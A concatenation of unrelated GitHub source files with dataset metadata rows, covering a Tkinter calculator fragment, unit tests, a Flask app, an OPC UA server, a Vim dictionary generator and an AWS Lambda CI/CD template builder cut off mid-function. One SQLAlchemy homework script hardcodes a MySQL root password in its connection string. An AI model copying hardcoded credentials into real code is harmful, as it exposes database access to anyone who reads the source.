        btn_mean=Button(main_frame,text="Calculate",command=calculate,font=("times new roman",14),cursor="hand2",bd=0,bg="lightgreen",fg="White").place(x=100,y=180,width=300,height=35)
# Build the Tk root window, attach the calculator UI and enter the event loop.
root=Tk()
obj=Register(root)
root.mainloop()
| hansraj2000/Login-System-With-Registration-and-OTP-Verification | Login system/MeanMod.py | MeanMod.py | py | 3,950 | python | en | code | 0 | github-code | 90 |
37241465421 |
import pytest
import unittest
from mockito import when
from clash_royale_service import ClashRoyaleService
from tests.resources import clash_royale_client_currentriverrace, clash_royale_client_responses
class TestClanRemainingWarPlayers(unittest.TestCase):

    def test_clan_players_remaining_war_attacks(self):
        """Players with unfinished war attacks are listed with their deck usage."""
        service = ClashRoyaleService()
        clan_tag = "#9GULPJ9L"

        # Mock API responses and certain function calls
        when(service.clash_royale_client).get_current_river_race(clan_tag).thenReturn(
            clash_royale_client_currentriverrace.CURRENT_RIVER_RACE_API_RESPONSE
        )
        when(service.clash_royale_client).get_clan_info(clan_tag).thenReturn(
            clash_royale_client_responses.CLAN_INFO_API_RESPONSE
        )

        all_current_war_players_output = service.clan_players_remaining_war_attacks(clan_tag)

        # Note 1: three players took part in the war; one completed all attacks
        # and therefore is not listed.
        # Note 2: two players still have attacks left, hence two entries.
        player_1 = all_current_war_players_output[0]
        player_2 = all_current_war_players_output[1]
        self.assertEqual(len(all_current_war_players_output), 2)
        # assertEqual gives a useful failure message, unlike assertTrue(x == y).
        self.assertEqual(player_1.decks_used_today, 3)
        self.assertEqual(player_2.decks_used_today, 2)
34630059065 | import haikugen
from flask import Flask, render_template, request
app = Flask(__name__)

@app.route('/', methods=["GET", "POST"])
def index():
    """Render the home page; on POST of the 'generate' button, create a haiku."""
    # Default to empty lines; filled only when the generate button is posted.
    first = second = third = ""
    if request.method == "POST":
        if request.form.get("generate") == "generate":
            first, second, third = haikugen.genhaiku()
    return render_template("index.html", first=first, second=second, third=third)

# Run the development server when executed directly.
if __name__ == "__main__":
    app.run()
| rxxed/ha1kugen | app.py | app.py | py | 443 | python | en | code | 0 | github-code | 90 |
34947643237 | """1) Создайте новую Базу данных. Поля: id, 2 целочисленных поля.
Целочисленные поля заполняются рандомно от 0 до 9.
Посчитайте среднее арифметическое всех элементов без учёта id.
Если среднее арифметическое больше количества записей в БД, то удалите четвёртую запись БД"""
import sqlalchemy as db
import random
# Table with an autoincrement id and two random integer columns.
meta = db.MetaData()
user = db.Table('User', meta,
                db.Column('id', db.Integer, primary_key=True),
                db.Column('num_1', db.Integer, nullable=True),
                db.Column('num_2', db.Integer, nullable=True))
# print(user.c)
engine = db.create_engine('mysql+mysqlconnector://root:DfbDTuZG1DfbDTuZG1@localhost:3306/hw_23_task_01')
meta.create_all(engine)
connection = engine.connect()
# Insert one row with two random digits in 0..9.
num_1 = random.randint(0, 9)
num_2 = random.randint(0, 9)
add_query = user.insert().values(num_1=num_1, num_2=num_2)
connection.execute(add_query)
connection.commit()
search_ = db.select(user)
result = connection.execute(search_)
final_result = result.fetchall()
total_sum = 0
for i in final_result:
    # NOTE(review): sum(i) also includes the id column, but the assignment
    # asks for the mean WITHOUT the id — confirm whether id must be excluded.
    total_sum += sum(i)
arith_mean = total_sum / (len(final_result) * 2)
print(f'Среднее арифметическое равно {arith_mean}, {total_sum}')
print(f'Длина БД: {len(final_result)}')
# Delete row id=4 when the mean exceeds the row count (per the task statement).
if arith_mean > len(final_result):
    delete_query_for_id = user.delete().where(user.c.id == 4)
    result = connection.execute(delete_query_for_id)
    # connection.commit()
    search_ = db.select(user)
    result = connection.execute(search_)
    print(result.fetchall())
connection.close()
| Alesya-Laykovich/alesya_laykovich_homeworks | homework_23/task_01.py | task_01.py | py | 1,743 | python | ru | code | 0 | github-code | 90 |
27647112354 | from collections import OrderedDict
# Skdaccess imports
from skdaccess.framework.data_class import DataFetcherBase, ImageWrapper
# 3rd party imports
import h5py
class DataFetcher(DataFetcherBase):
    '''
    Generic data fetcher for loading images from an hdf file
    '''

    def __init__(self, dataset_dict, verbose=False):
        '''
        Initialize DataFetcher

        @param dataset_dict: Dictionary where the keys are filenames and the
                             values are lists of dataset names
        @param verbose: Output extra debug information
        '''
        self.dataset_dict = dataset_dict
        super(DataFetcher, self).__init__([], verbose)

    def output(self):
        '''
        Output data wrapper

        @return Image Data Wrapper
        '''
        data_dict = OrderedDict()
        metadata_dict = OrderedDict()

        for filename, dataset_list in self.dataset_dict.items():
            # Context manager closes the HDF5 handle (previously leaked);
            # [:] materializes each dataset in memory, so closing is safe.
            with h5py.File(filename, mode='r') as h5_file:
                for dataset_name in dataset_list:
                    data_label = filename + ': ' + dataset_name
                    data_dict[data_label] = h5_file[dataset_name][:]
                    metadata_dict[data_label] = OrderedDict()
                    metadata_dict[data_label]['filename'] = filename
                    # Fixed typo: key was 'dataaset_name'.
                    metadata_dict[data_label]['dataset_name'] = dataset_list

        # NOTE(review): metadata_dict is built but never handed to ImageWrapper;
        # confirm whether ImageWrapper should receive it as a second argument.
        return ImageWrapper(data_dict)
| MITHaystack/scikit-dataaccess | skdaccess/generic/images/hdf.py | hdf.py | py | 1,358 | python | en | code | 44 | github-code | 90 |
1502520766 | import asyncio
import logging
from asyncua import Server, ua
from asyncua.common.methods import uamethod
@uamethod
def func(parent, value):
    # OPC UA server method: returns double the supplied value.
    return value * 2
async def main():
    """Run a minimal OPC UA "chat" server.

    Exposes a writable input variable; the server loop copies any non-empty
    input value into a display variable and then clears the input.
    """
    _logger = logging.getLogger("asyncua")
    # setup our server
    server = Server()
    await server.init()
    server.set_endpoint("opc.tcp://0.0.0.0:4840/freeopcua/server/")
    server.set_server_name("opcua-chat-server")
    # setup our own namespace, not really necessary but should as spec
    uri = "http://examples.freeopcua.github.io"
    idx = await server.register_namespace(uri)
    # populating our address space
    # server.nodes, contains links to very common nodes like objects and root
    myobj = await server.nodes.objects.add_object(idx, "MyChatObjects")
    myvar_input = await myobj.add_variable(idx, "MyChatVar_Input", "")
    myvar_display = await myobj.add_variable(idx, "MyChatVar_Display", "Starting Chat")
    # Set the input variable to be writable by clients
    await myvar_input.set_writable()
    await server.nodes.objects.add_method(
        ua.NodeId("ServerMethod", idx),
        ua.QualifiedName("ServerMethod", idx),
        func,
        [ua.VariantType.Int64],
        [ua.VariantType.Int64],
    )
    _logger.info("Starting server!")
    print("running..")
    async with server:
        while True:
            # short pause to give the server some breathing room
            await asyncio.sleep(0.1)
            # if there is something in the input variable, copy it to the
            # display variable and reset the input to an empty string
            if await myvar_input.get_value() != '':
                new_input = await myvar_input.get_value()
                await myvar_display.write_value(new_input)
                await myvar_input.write_value('')
                print(f"## {new_input}")
# Entry point: start the asyncio event loop running the chat server.
if __name__ == "__main__":
    #logging.basicConfig(level=logging.DEBUG)
    logging.basicConfig(level=logging.CRITICAL)
    asyncio.run(main(), debug=True)
| scrimbley/opcua_concept_chat_server | opcua-server.py | opcua-server.py | py | 1,969 | python | en | code | 0 | github-code | 90 |
26870552315 | import numpy as np
import numpy.testing as npt
from saf.util.observedorder import compute_observed_order_of_accuracy
from ..henrickapproximator import HenrickApproximator
class TestHenrickApproximator:
    def test__sine_function__should_give_approximation_of_derivative(self):
        """Derivative of sin on a uniform grid should match cos pointwise."""
        x, dx = np.linspace(0, 2*np.pi, num=100, retstep=True)
        eps = 1e-40
        approx = HenrickApproximator(len(x), dx, eps)
        ng = 3  # points skipped at the left boundary
        y = np.sin(x)
        desired = np.cos(x[ng:])
        result = np.empty_like(y)
        approx.approximate_flux_derivatives(np.zeros_like(y), y, 0.0, result)
        npt.assert_allclose(result[ng:], desired, rtol=1e-6, atol=0)

    def test__sine_function__should_give_fourth_order(self):
        # This tests checks that HenrickApproximator converges
        # to the fourth order of accuracy.
        # It should be fifth order, but one point is approximated with the
        # fourth order, hence the global convergence of the approximator
        # is lower.
        r = 2.0
        powers = np.arange(2, 7)
        n_list = 10.0 * r**powers
        error_list = []

        for n in n_list:
            # Bug fix: n_list holds floats (10.0 * r**powers) and np.linspace
            # requires an integer sample count, so cast explicitly.
            x, dx = np.linspace(0, 1.2, num=int(n), retstep=True)
            eps = 1e-40
            approx = HenrickApproximator(len(x), dx, eps)
            y = np.sin(x)
            v = np.zeros_like(y)
            desired = np.cos(x[3:])
            result = np.empty_like(y)
            approx.approximate_flux_derivatives(v, y, 0.0, result)
            result = result[3:]
            error = np.linalg.norm(result - desired, np.inf)
            error_list.append(error)

        errors = np.asarray(error_list)
        observed_orders = compute_observed_order_of_accuracy(errors, n_list)
        min_order = 4.0
        npt.assert_(all(observed_orders[1:] >= min_order))
| dmitry-kabanov/fickettmodel | saf/nonlinear/tests/test_henrickapproximator.py | test_henrickapproximator.py | py | 1,817 | python | en | code | 0 | github-code | 90 |
70278387498 | import os
from dotenv import load_dotenv
from google.cloud import bigquery
# Load environment configuration (.env) and read the target identifiers.
load_dotenv()
project_name = os.environ.get('PROJECT_NAME')
dataset_name = os.environ.get('DATASET_NAME')
bucket_name = os.environ.get('BUCKET_NAME')
table_name = 'source_neko'
client = bigquery.Client()
table_id = f"{project_name}.{dataset_name}.{table_name}"
# job_config = bigquery.LoadJobConfig(
#     schema=[
#         bigquery.SchemaField("id", "INTEGER"),
#         bigquery.SchemaField("name", "STRING"),
#     ],
# )
# Create the table with an explicit two-column schema.
schema = [
    bigquery.SchemaField("id", "INTEGER", mode="REQUIRED"),
    bigquery.SchemaField("name", "STRING", mode="REQUIRED"),
]
table = bigquery.Table(table_id, schema=schema)
table = client.create_table(table)
# Stream three sample rows into the new table.
data = [
    {"id": 1, "name": "John"},
    {"id": 4, "name": "Taro"},
    {"id": 3, "name": "Reina"},
]
errors = client.insert_rows_json(table_id, data)
if not errors:
    print("Data inserted successfully.")
# NOTE(review): insert errors are silently ignored when `errors` is non-empty.
| nuevocs/gcp-bq-python | sample-scripts/create_table_rows.py | create_table_rows.py | py | 938 | python | en | code | 0 | github-code | 90 |
71095892137 | # https://leetcode.com/problems/permutation-in-string
# medium
# daily
from collections import Counter
class Solution:
    def checkInclusion(self, s1: str, s2: str) -> bool:
        """Return True if some permutation of s1 occurs as a substring of s2.

        Fixed-size sliding window over s2, comparing letter counts with s1.
        (The previous version only tracked matched characters, so interleaved
        non-matching characters produced false positives, e.g.
        checkInclusion("ab", "axb") returned True.)
        """
        n = len(s1)
        if n > len(s2):
            return False
        need = Counter(s1)
        window = Counter(s2[:n])
        if window == need:
            return True
        for i in range(n, len(s2)):
            # Slide the window one character to the right.
            window[s2[i]] += 1
            left = s2[i - n]
            window[left] -= 1
            if window[left] == 0:
                del window[left]  # keep the Counter comparison exact
            if window == need:
                return True
        return False
| gerus66/leetcode | medium/567_permutation_in_string.py | 567_permutation_in_string.py | py | 671 | python | en | code | 0 | github-code | 90 |
26612266518 | #!/usr/bin/env python
"""
pydiction.py 1.2.3 by Ryan Kulla (rkulla AT gmail DOT com).
License: BSD.
Description: Creates a Vim dictionary of Python module attributes for Vim's
completion feature. The created dictionary file is used by
the Vim ftplugin "python_pydiction.vim".
Usage: pydiction.py <module> [<module> ...] [-v]
Example: The following will append all the "time" and "math" modules'
attributes to a file, in the current directory, called "pydiction",
with and without the "time." and "math." prefix:
$ python pydiction.py time math
To output only to stdout and not append to file, use -v:
$ python pydiction.py -v time math
"""
__author__ = "Ryan Kulla (rkulla AT gmail DOT com)"
__version__ = "1.2.3"
__copyright__ = "Copyright (c) 2003-2014 Ryan Kulla"
import os
import sys
import types
import shutil
# Path/filename of the vim dictionary file to write to:
PYDICTION_DICT = r'complete-dict'
# Path/filename of the vim dictionary backup file:
PYDICTION_DICT_BACKUP = r'complete-dict.last'
# Sentinel to test if we should only output to stdout:
STDOUT_ONLY = False
def get_submodules(module_name, submodules):
    """Append the dotted names of module_name's module-type attributes to submodules."""
    try:
        module = my_import(module_name)
    except ImportError:
        # Unimportable modules contribute nothing.
        return submodules
    for attr_name in dir(module):
        try:
            attr = getattr(module, attr_name)
        except AttributeError as err:
            print(err)
            continue
        if isinstance(attr, types.ModuleType):
            submodules.append('%s.%s' % (module_name, attr_name))
    return submodules
def get_format(imported_module, mod_attr, use_prefix):
    """Return the printf template for one attribute line of the dictionary.

    Callable attributes get a trailing '('; with use_prefix the module name is
    included as well.  Returns '' when the attribute cannot be read.
    """
    if use_prefix:
        plain, call = '%s.%s', '%s.%s('
    else:
        plain, call = '%s', '%s('
    try:
        attribute = getattr(imported_module, mod_attr)
    except AttributeError as err:
        print(err)
        return ''
    return call if callable(attribute) else plain
def write_dictionary(module_name, module_list):
    """Write one module's attributes to the Vim dictionary file (global write_to).

    Emits three sections: fully-qualified names ("mod.attr"), names qualified
    by the last dotted component (for dotted module names), and bare names.
    """
    python_version = '%s.%s.%s' % get_python_version()
    try:
        imported_module = my_import(module_name)
    except ImportError:
        return
    mod_attrs = dir(imported_module)
    # If a module was passed on the command-line we'll call it a root module
    if module_name in module_list:
        try:
            module_version = '%s/' % imported_module.__version__
        except AttributeError:
            module_version = ''
        module_info = '(%spy%s/%s/root module) ' % (
            module_version, python_version, sys.platform)
    else:
        module_info = ''
    write_to.write('--- import %s %s---\n' % (module_name, module_info))
    for mod_attr in mod_attrs:
        # NOTE: the local name 'format' shadows the builtin of the same name.
        format = get_format(imported_module, mod_attr, True)
        if format != '':
            write_to.write(format % (module_name, mod_attr) + '\n')
    # Generate submodule names by themselves, for when someone does
    # "from foo import bar" and wants to complete bar.baz.
    # This works the same no matter how many .'s are in the module.
    if module_name.count('.'):
        # Get the "from" part of the module. E.g., 'xml.parsers'
        # if the module name was 'xml.parsers.expat':
        first_part = module_name[:module_name.rfind('.')]
        # Get the "import" part of the module. E.g., 'expat'
        # if the module name was 'xml.parsers.expat'
        second_part = module_name[module_name.rfind('.') + 1:]
        write_to.write('--- from %s import %s ---\n' %
                       (first_part, second_part))
        for mod_attr in mod_attrs:
            format = get_format(imported_module, mod_attr, True)
            if format != '':
                write_to.write(format % (second_part, mod_attr) + '\n')
    # Generate non-fully-qualified module names:
    write_to.write('--- from %s import * ---\n' % module_name)
    for mod_attr in mod_attrs:
        format = get_format(imported_module, mod_attr, False)
        if format != '':
            write_to.write(format % mod_attr + '\n')
def my_import(name):
    """__import__ wrapper that returns the leaf module for dotted names."""
    module = __import__(name)
    for part in name.split('.')[1:]:
        module = getattr(module, part)
    return module
def remove_duplicates(seq, keep=()):
    """
    Return seq with duplicates removed, preserving the original order.

    Items listed in the optional tuple `keep` are never treated as
    duplicates and are retained every time they occur.
    """
    unique = []
    seen = set()
    for item in seq:
        if item in keep:
            unique.append(item)
        elif item not in seen:
            unique.append(item)
            seen.add(item)
    return unique
def get_yesno(msg="[Y/n]?"):
    """
    Prompt until the user answers yes or no; return True for yes, False for no.

    An empty answer (just Enter) counts as yes.  Any input whose first letter
    is y/Y or n/N is accepted; anything else re-prompts.  Takes an optional
    prompt message, defaulting to "[Y/n]?".
    """
    while True:
        # Bug fix: the original called raw_input(), which does not exist in
        # Python 3 (this file otherwise targets Python 3 syntax).
        answer = input(msg)
        if answer == '':
            return True
        answer = answer.lower()[0]
        if answer == 'y':
            return True
        if answer == 'n':
            return False
        print("Invalid option. Please try again.")
def main(write_to, module_list):
    """Generate a Vim completion dictionary of python module attributes.

    Imports each module in module_list (dropping any that fail to import),
    expands the list with all discovered submodules, writes every attribute
    via write_dictionary(), then deduplicates the dictionary file in place
    (unless STDOUT_ONLY is set).
    """
    submodules = []
    # Iterate over a copy: the original looped over module_list while calling
    # module_list.remove(), which skips the element after each removal.
    for module_name in list(module_list):
        try:
            my_import(module_name)
        except ImportError as err:
            print("Couldn't import: %s. %s" % (module_name, err))
            module_list.remove(module_name)
    # Step through each command line argument:
    for module_name in module_list:
        print("Trying module: %s" % module_name)
        submodules = get_submodules(module_name, submodules)
    # Step through the current module's submodules (appending while iterating
    # deliberately walks the transitive closure):
    for submodule_name in submodules:
        submodules = get_submodules(submodule_name, submodules)
    # Add the top-level modules to the list too:
    for module_name in module_list:
        submodules.append(module_name)
    submodules = remove_duplicates(submodules)
    submodules.sort()
    # Step through all of the modules and submodules to create the dict file:
    for submodule_name in submodules:
        write_dictionary(submodule_name, module_list)
    if STDOUT_ONLY:
        return
    # Close and reopen the file for reading and remove all duplicate lines:
    write_to.close()
    print("Removing duplicates...")
    with open(PYDICTION_DICT, 'r') as f:
        file_lines = f.readlines()
    file_lines = remove_duplicates(file_lines)
    # Delete the original file:
    os.unlink(PYDICTION_DICT)
    # Recreate the file, this time without any duplicate lines:
    with open(PYDICTION_DICT, 'w') as f:
        for attr in file_lines:
            f.write(attr)
    print("Done.")
def get_python_version():
    """Return the (major, minor, micro) python version as a tuple."""
    major, minor, micro = sys.version_info[:3]
    return (major, minor, micro)
def remove_existing_modules(module_list):
    """Drop modules that already appear in the dictionary file.

    Scans PYDICTION_DICT for '--- import <name> ' headers and removes the
    matching names from module_list.  Returns the (mutated) list.
    """
    with open(PYDICTION_DICT, 'r') as f:
        file_lines = f.readlines()
    # Iterate over a copy: the original removed from module_list while
    # iterating it, which skips the element following each removal.
    for module_name in list(module_list):
        for line in file_lines:
            if line.find('--- import %s ' % module_name) != -1:
                print('"%s" already exists in %s. Skipping...' %
                      (module_name, PYDICTION_DICT))
                module_list.remove(module_name)
                break
    return module_list
if __name__ == '__main__':
    """Process the command line."""
    # (The string above is a no-op statement retained from the original.)
    if get_python_version() < (2, 3):
        sys.exit("You need at least Python 2.3")
    if len(sys.argv) <= 1:
        sys.exit("%s requires at least one argument. None given." %
                 sys.argv[0])
    module_list = sys.argv[1:]
    # -v: write to stdout only; no dictionary file is touched.
    if '-v' in sys.argv:
        write_to = sys.stdout
        module_list.remove('-v')
        STDOUT_ONLY = True
    elif os.path.exists(PYDICTION_DICT):
        module_list = remove_existing_modules(sys.argv[1:])
        if len(module_list) < 1:
            # Check if there's still enough command-line arguments:
            sys.exit("Nothing new to do. Aborting.")
        # Offer to overwrite an existing backup before appending.
        if os.path.exists(PYDICTION_DICT_BACKUP):
            answer = get_yesno('Overwrite existing backup "%s" [Y/n]? ' %
                               PYDICTION_DICT_BACKUP)
            if (answer):
                print("Backing up old dictionary to: %s" % \
                      PYDICTION_DICT_BACKUP)
                try:
                    shutil.copyfile(PYDICTION_DICT, PYDICTION_DICT_BACKUP)
                except IOError as err:
                    print("Couldn't back up %s. %s" % (PYDICTION_DICT, err))
            else:
                print("Skipping backup...")
            print('Appending to: "%s"' % PYDICTION_DICT)
        else:
            print("Backing up current %s to %s" % \
                  (PYDICTION_DICT, PYDICTION_DICT_BACKUP))
            try:
                shutil.copyfile(PYDICTION_DICT, PYDICTION_DICT_BACKUP)
            except IOError as err:
                print("Couldn't back up %s. %s" % (PYDICTION_DICT, err))
    else:
        print('Creating file: "%s"' % PYDICTION_DICT)
    if not STDOUT_ONLY:
        # Append mode: existing entries are kept; main() deduplicates later.
        write_to = open(PYDICTION_DICT, 'a')
    main(write_to, module_list)
| rkulla/pydiction | pydiction.py | pydiction.py | py | 9,984 | python | en | code | 279 | github-code | 90 |
73384780457 | # -*- coding: utf-8 -*-
# @Time : 2020/5/29 22:01
# 公众号:Python自动化办公社区
# @File : xpath.py
# @Software: PyCharm
# @Description: 怎么定位网页中的数据?XPath的基本使用。
import requests
from lxml import html
# Fetch a web page and collect article titles from its list anchors.
def get_html_data(url):
    """Download `url`, parse it with lxml, and return the concatenated text
    of every <a> inside the qzw_articlelist <li> elements."""
    response = requests.get(url)
    response.encoding = 'utf-8'
    page_source = response.text
    # Parse the raw HTML into an element tree.
    document = html.etree.HTML(page_source)
    # Locate each list item under the article-list container.
    items = document.xpath('//*[@class="qzw_articlelist"]//li')
    titles = ''
    for item in items:
        # Take the first text node of the item's <a> tag.
        titles += str(item.xpath('./a/text()')[0])
    return titles
# Count zero-sum contiguous subarrays via pairs of equal prefix sums.
N = int(input())
A = list(map(int, input().split()))
prefix = 0
counts = {0: 1}  # the empty prefix sums to 0
for i in range(N):
    prefix += A[i]
    counts[prefix] = counts.get(prefix, 0) + 1
# Every pair of equal prefix sums delimits one zero-sum subarray.
ans = 0
for value in counts:
    ans += counts[value] * (counts[value] - 1) // 2
print(ans)
18297812919 | from sys import stdout
import bisect
# One-letter I/O helpers typical of competitive-programming solutions.
printn = lambda x: stdout.write(x)
inn = lambda : int(input())
inl = lambda: list(map(int, input().split()))
inm = lambda: map(int, input().split())
DBG = True # and False
BIG = 999999999
R = 10**9 + 7
def ddprint(x):
    # Debug print, silenced when DBG is False.
    if DBG:
        print(x)
def f(x):
    # True when at least m ordered pairs (i, j) satisfy a[i] + a[j] >= x
    # (a is sorted ascending; bisect finds the first partner >= x - a[i]).
    sm = 0
    for i in range(n-1,-1,-1):
        j = bisect.bisect_left(a,x-a[i])
        sm += n-j
        if sm>=m:
            return True
    return False
# Read n, m and the values; acc[i] holds the suffix sum of a[i:].
n,m = inm()
a = inl()
a.sort()
acc = [0]*(n+1)
for i in range(n-1,-1,-1):
    acc[i] = acc[i+1]+a[i]
# Binary search the threshold: keep mn feasible (f true), mx infeasible.
mn = 2*min(a)
mx = 2*max(a)+1
while mx-mn>=2:
    mid = (mx+mn)//2
    if f(mid):
        mn = mid
    else:
        mx = mid
# mn is the m-th
# sum and cnt upto mn+1
sm = cnt = 0
for i in range(n):
    j = bisect.bisect_left(a,mx-a[i])
    sm += acc[j]+(n-j)*a[i]
    cnt += n-j
print(sm+mn*(m-cnt))
| Aasthaengg/IBMdataset | Python_codes/p02821/s507276259.py | s507276259.py | py | 862 | python | en | code | 0 | github-code | 90 |
2439307886 | import yaml
import os
import boto3
import time
# Module-level boto3 clients/resources, created once at import time and
# shared by every helper below.
s3_client = boto3.client('s3')
s3_resource = boto3.resource('s3')
cfn_client = boto3.client('cloudformation')
'''
将错误提取出来写入到notification中
args:
event = {
"version": "20220622",
"commit": "9f2b50e4bc89dd903f85ef1215f0b31079537450",
"publisher": "赵浩博",
"alias": "Current",
"runtime": "dev",
"lambdaArgs": [
{
"stackName": "functionName"
"functionPath": "",
"functionPrefixPath": "",
"buildSpec": "",
"codebuildCfn": "",
"functionName": "",
"branchName": "",
"repoName": "",
"alias": "",
"gitCommit": "",
"gitUrl": ""
}, {...}
],
"stepFunctionArgs": {
"stateMachineName": "functionName + codebuild",
"submitOwner": "",
"s3Bucket": "",
"s3TemplateKey": ""
}
},
return:
{
"manageUrl": manageUrl,
"stackName": stackName
}
}
'''
# S3 bucket / keys of the reusable CloudFormation template fragments.
manageTemplateS3Key = "ph-platform"
manageTemplateS3Path = "2020-11-11/cicd/template/manageTemplate.yaml"
sfnTemplateS3Key = "ph-platform"
sfnTemplateS3Path = "2020-11-11/cicd/template/sfnTemplate.yaml"
TemplateS3Key = "ph-platform"
lmdVersionTemplateS3Path = "2020-11-11/cicd/template/lmdVersion.yaml"
lmdAliasTemplateS3Path = "2020-11-11/cicd/template/lmdAlias.yaml"
# Key prefix / public URL prefix under which generated artifacts live.
resourcePathPrefix = "2020-11-11/cicd/"
manageUrlPrefix = "https://ph-platform.s3.cn-northwest-1.amazonaws.com.cn/2020-11-11/cicd/"
# Scratch paths in Lambda's writable /tmp.  ("mange" is a long-standing typo,
# kept because the name is used throughout this module.)
mangeLocalPath = "/tmp/manage.yaml"
sfnLocalPath = "/tmp/sfnTemplate.yaml"
lmdVersionLocalPath = "/tmp/lmdVersion.yaml"
lmdAliasLocalPath = "/tmp/lmdAlias.yaml"
class Ref(object):
    """YAML-serializable stand-in for CloudFormation's ``!Ref`` short form."""

    def __init__(self, value):
        self.value = value

    def __repr__(self):
        return self.deal()

    def deal(self):
        # Render the intrinsic exactly as CloudFormation expects it.
        return u"!Ref " + self.value


class GetAtt(object):
    """YAML-serializable stand-in for CloudFormation's ``!GetAtt`` short form."""

    def __init__(self, value):
        self.value = value

    def __repr__(self):
        return self.deal()

    def deal(self):
        return u"!GetAtt " + self.value


def ref_constructor(loader, node):
    """PyYAML constructor: turn a ``!Ref`` node into its plain-string form."""
    return str(Ref(loader.construct_scalar(node)))


def getatt_constructor(loader, node):
    """PyYAML constructor: turn a ``!GetAtt`` node into its plain-string form."""
    return str(GetAtt(loader.construct_scalar(node)))
def upload_s3_file(bucket_name, object_name, file):
    """Upload the local file *file* to ``s3://bucket_name/object_name``."""
    s3_client.upload_file(Filename=file, Bucket=bucket_name, Key=object_name)
def download_s3_file(s3_key, s3_path, local_path):
    """Download ``s3://<s3_key>/<s3_path>`` to *local_path*.

    Despite the parameter names, ``s3_key`` is the bucket and ``s3_path``
    the object key (see the ``download_fileobj`` call order).  Parent
    directories are created on demand; ``exist_ok=True`` replaces the
    original's racy exists-then-makedirs check.
    """
    local_dir_path = os.path.dirname(local_path)
    if local_dir_path:
        os.makedirs(local_dir_path, exist_ok=True)
    with open(local_path, 'wb') as data:
        s3_client.download_fileobj(s3_key, s3_path, data)
def read_yaml_file(file_path):
    """Parse a YAML file, rendering !Ref / !GetAtt tags as plain strings."""
    # Register the custom constructors so CloudFormation short-form tags
    # survive parsing as ordinary strings.
    yaml.add_constructor(u'!Ref', ref_constructor)
    yaml.add_constructor(u'!GetAtt', getatt_constructor)
    with open(file_path, encoding='utf-8') as fh:
        return yaml.load(fh.read(), Loader=yaml.FullLoader)
def write_yaml_file(result, file_path):
    """Serialize *result* as YAML to *file_path*, stripping single quotes.

    ``yaml.dump`` returns one string, so the loop walks it character by
    character; the per-character ``replace`` deletes every ``'`` —
    presumably so that dumped "!Ref ..." strings re-read as bare YAML tags
    (TODO confirm).  A context manager replaces the original open/close
    pair, which leaked the handle if a write raised.
    """
    with open(file_path, "w") as out:
        for ch in yaml.dump(result):
            out.write(ch.replace("'", ""))
def s3_file_exist(s3_key, s3_path):
    """Return True iff bucket *s3_key* holds an object whose key is exactly *s3_path*.

    Returns on the first exact match instead of scanning the entire prefix
    listing as the original did.
    """
    bucket = s3_resource.Bucket(s3_key)
    for obj in bucket.objects.filter(Prefix=s3_path):
        if obj.key == s3_path:
            return True
    return False
def copy_manage_resource(bucket_name, prefix):
    """Back up ``<prefix>/manage.yaml`` to ``<prefix>/manage_back.yaml`` in the same bucket."""
    source = {'Bucket': bucket_name, 'Key': prefix + "/manage.yaml"}
    s3_resource.meta.client.copy(source, bucket_name, prefix + "/manage_back.yaml")
def lambda_handler(event, context):
    """Assemble the aggregated ``manage.yaml`` template and upload it to S3.

    In order: fetch the state-machine and Lambda Version/Alias template
    fragments; load (or initialize) the existing manage template, backing
    it up first; splice every function's package.yaml resource into it;
    append timestamped Version/Alias resources and the Step Functions
    state machine as raw text; upload the result.

    :param event: payload described in the module header comment
    :param context: Lambda context (unused)
    :return: dict with ``manageUrl``, ``stackName`` and empty ``stackParameters``
    """
    # Download the sfn / lambda-version / lambda-alias template fragments from S3.
    download_s3_file(sfnTemplateS3Key, sfnTemplateS3Path, sfnLocalPath)
    download_s3_file(TemplateS3Key, lmdAliasTemplateS3Path, lmdAliasLocalPath)
    download_s3_file(TemplateS3Key, lmdVersionTemplateS3Path, lmdVersionLocalPath)
    # If manage.yaml already exists, download it (and keep a backup copy)
    # so it can be edited in place.
    if s3_file_exist("ph-platform", resourcePathPrefix + event["processor"]["prefix"] + "/manage.yaml"):
        download_s3_file("ph-platform", resourcePathPrefix + event["processor"]["prefix"] + "/manage.yaml",
                         mangeLocalPath)
        copy_manage_resource("ph-platform", resourcePathPrefix + event["processor"]["prefix"])
    else:
        # Not present yet: start from the blank manage template skeleton.
        download_s3_file(manageTemplateS3Key, manageTemplateS3Path, mangeLocalPath)
    # Read the manage.yaml content.
    manage_result = read_yaml_file(mangeLocalPath)
    if not manage_result.get("Resources"):
        manage_result["Resources"] = {}
    # Transform and the state-machine resource are re-appended as raw text
    # below, so any previously parsed copies must be dropped first.
    if manage_result.get("Transform"):
        del manage_result["Transform"]
    if manage_result["Resources"].get(event["runtime"].upper() + "PhStateMachine"):
        del manage_result["Resources"][event["runtime"].upper() + "PhStateMachine"]
    print(manage_result)
    # For every function, derive the package.yaml S3 path from functionPath
    # and splice its resource into the manage template.
    for lambdaArg in event["lambdaArgs"]:
        functionPath = lambdaArg["functionPath"]
        functionName = lambdaArg["functionName"]
        package_s3_key = "ph-platform"
        package_s3_path = resourcePathPrefix + functionPath + "/package/package.yaml"
        package_local_path = "/tmp/cicd/tmp/" + lambdaArg["functionName"] + "/package.yaml"
        # Download this function's packaged template.
        download_s3_file(package_s3_key, package_s3_path, package_local_path)
        # Merge its function resource into the manage template.
        package_result = read_yaml_file(package_local_path)
        manage_result["Resources"][functionName] = package_result["Resources"]["ATTFFunction"]
        if manage_result["Resources"][functionName].get("Metadata"):
            del manage_result["Resources"][functionName]["Metadata"]
        versionResourcePrefix = lambdaArg["functionName"] + "Version" + event["version"].replace("-", "")
        aliasResourcePrefix = lambdaArg["functionName"] + "Alias" + event["version"].replace("-", "")
        # Drop stale Version/Alias resources for this function+version; fresh
        # (timestamped) ones are appended as text below.
        del_keys = []
        for key in manage_result["Resources"].keys():
            if key.startswith(versionResourcePrefix) or key.startswith(aliasResourcePrefix):
                del_keys.append(key)
        if del_keys:
            for del_key in del_keys:
                del manage_result["Resources"][del_key]
    write_yaml_file(manage_result, mangeLocalPath)
    # Append the Version/Alias fragments per function, with placeholders filled in.
    manage = open(mangeLocalPath, "a+")
    for lambdaArg in event["lambdaArgs"]:
        f1 = open(lmdVersionLocalPath, "r")
        f2 = open(lmdAliasLocalPath, "r")
        versionResourceName = lambdaArg["functionName"] + "Version" + event["version"].replace("-", "") + str(int(round(time.time() * 1000)))
        versionAlisaName = lambdaArg["functionName"] + "Alias" + event["version"].replace("-", "")
        manage.write(" " + versionResourceName + ":\n")
        for line in f1.readlines():
            manage.write(line.replace("${ReplaceLmdName}", lambdaArg["functionName"]))
        manage.write("\n")
